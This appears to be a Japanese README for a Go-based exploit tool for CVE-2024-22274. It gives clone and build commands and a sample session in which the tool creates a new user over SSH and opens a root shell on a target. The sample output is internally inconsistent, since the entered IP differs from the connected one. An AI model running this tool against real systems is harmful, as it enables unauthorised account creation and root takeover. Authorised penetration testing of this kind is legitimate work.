
CVE-2024-22274のGoベースのエクスプロイト。SSHを介して新しいユーザーを作成し、許可されたペネトレーションテストのためにターゲットマシンでルートシェルを提供する。
このリポジトリには、CVE-2024-22274 のエクスプロイトが含まれています。このエクスプロイトは、SSH 経由でリモートマシンに新しいユーザーを作成し、その後 root シェルを提供します。
リポジトリをクローンします:
git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git
cd CVE-2024-22274-RCE
必要なパッケージをインストールします:
go mod init cve-2024-22274
go mod tidy
go get golang.org/x/crypto/ssh
go get golang.org/x/term
Go プログラムをコンパイルします:
go build -o cve-2024-22274-rce main.go
コンパイルしたプログラムを実行します:
./cve-2024-22274-rce
プロンプトに従います:
ユーザーが作成されると、ターゲットマシン上で root シェルが取得できます。新しいユーザーとしてコマンドを実行できます。
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit):
免責事項 このコードは教育目的のみです。責任を持って、テストする許可を得たシステムに対してのみ使用してください。
ライセンス このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。